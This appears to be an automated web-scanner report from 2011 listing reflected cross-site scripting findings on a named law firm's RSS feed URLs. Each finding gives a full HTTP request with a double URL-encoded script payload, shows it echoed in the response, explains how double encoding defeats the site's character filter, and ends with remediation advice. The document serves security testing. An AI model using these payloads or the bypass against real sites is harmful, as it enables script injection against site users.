GET /rss7953a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea4cf2c1a532/practices/Insurance/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0999%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5bd9f5471e was submitted in the REST URL parameter 2. This input was echoed as a0999"><script>alert(1)</script>5bd9f5471e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practicesa0999%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5bd9f5471e/Insurance/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3861%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e021aa92fc8e was submitted in the REST URL parameter 3. This input was echoed as a3861"><script>alert(1)</script>021aa92fc8e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Insurancea3861%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e021aa92fc8e/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc903%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c3f9de4a75 was submitted in the REST URL parameter 4. This input was echoed as dc903"><script>alert(1)</script>8c3f9de4a75 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Insurance/rss.xmldc903%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c3f9de4a75 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8cc0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97bf63e9708 was submitted in the REST URL parameter 1. This input was echoed as a8cc0"><script>alert(1)</script>97bf63e9708 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rssa8cc0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97bf63e9708/practices/Intellectual_Property/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebee6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8cb5eed4035 was submitted in the REST URL parameter 2. This input was echoed as ebee6"><script>alert(1)</script>8cb5eed4035 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practicesebee6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8cb5eed4035/Intellectual_Property/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a6c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef1282db072c was submitted in the REST URL parameter 3. This input was echoed as 9a6c9"><script>alert(1)</script>f1282db072c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Intellectual_Property9a6c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef1282db072c/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7748%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1dd7e1a93aa was submitted in the REST URL parameter 4. This input was echoed as f7748"><script>alert(1)</script>1dd7e1a93aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Intellectual_Property/rss.xmlf7748%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1dd7e1a93aa HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d092e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1334ddb4b76 was submitted in the REST URL parameter 1. This input was echoed as d092e"><script>alert(1)</script>1334ddb4b76 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rssd092e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1334ddb4b76/practices/International_Trade/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d46e9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef30c22f14ce was submitted in the REST URL parameter 2. This input was echoed as d46e9"><script>alert(1)</script>f30c22f14ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practicesd46e9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef30c22f14ce/International_Trade/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fca14%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea76b08aeebe was submitted in the REST URL parameter 3. This input was echoed as fca14"><script>alert(1)</script>a76b08aeebe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/International_Tradefca14%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea76b08aeebe/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb24c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6e42435c0a7 was submitted in the REST URL parameter 4. This input was echoed as eb24c"><script>alert(1)</script>6e42435c0a7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/International_Trade/rss.xmleb24c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6e42435c0a7 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cd05%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4aa15667da1 was submitted in the REST URL parameter 1. This input was echoed as 2cd05"><script>alert(1)</script>4aa15667da1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss2cd05%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4aa15667da1/practices/Litigation/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c84a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed9dfe2363ba was submitted in the REST URL parameter 2. This input was echoed as 2c84a"><script>alert(1)</script>d9dfe2363ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices2c84a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed9dfe2363ba/Litigation/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 191ff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e238461b7a86 was submitted in the REST URL parameter 3. This input was echoed as 191ff"><script>alert(1)</script>238461b7a86 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Litigation191ff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e238461b7a86/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14505%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e478d1333f6d was submitted in the REST URL parameter 4. This input was echoed as 14505"><script>alert(1)</script>478d1333f6d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Litigation/rss.xml14505%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e478d1333f6d HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc84f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e79d0e014d42 was submitted in the REST URL parameter 1. This input was echoed as dc84f"><script>alert(1)</script>79d0e014d42 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rssdc84f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e79d0e014d42/practices/Postal/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a669%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6384682ca38 was submitted in the REST URL parameter 2. This input was echoed as 4a669"><script>alert(1)</script>6384682ca38 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices4a669%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6384682ca38/Postal/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6c53%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2206f6e398b was submitted in the REST URL parameter 3. This input was echoed as e6c53"><script>alert(1)</script>2206f6e398b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Postale6c53%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2206f6e398b/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a1f6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaf2258d21b7 was submitted in the REST URL parameter 4. This input was echoed as 5a1f6"><script>alert(1)</script>af2258d21b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Postal/rss.xml5a1f6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaf2258d21b7 HTTP/1.1
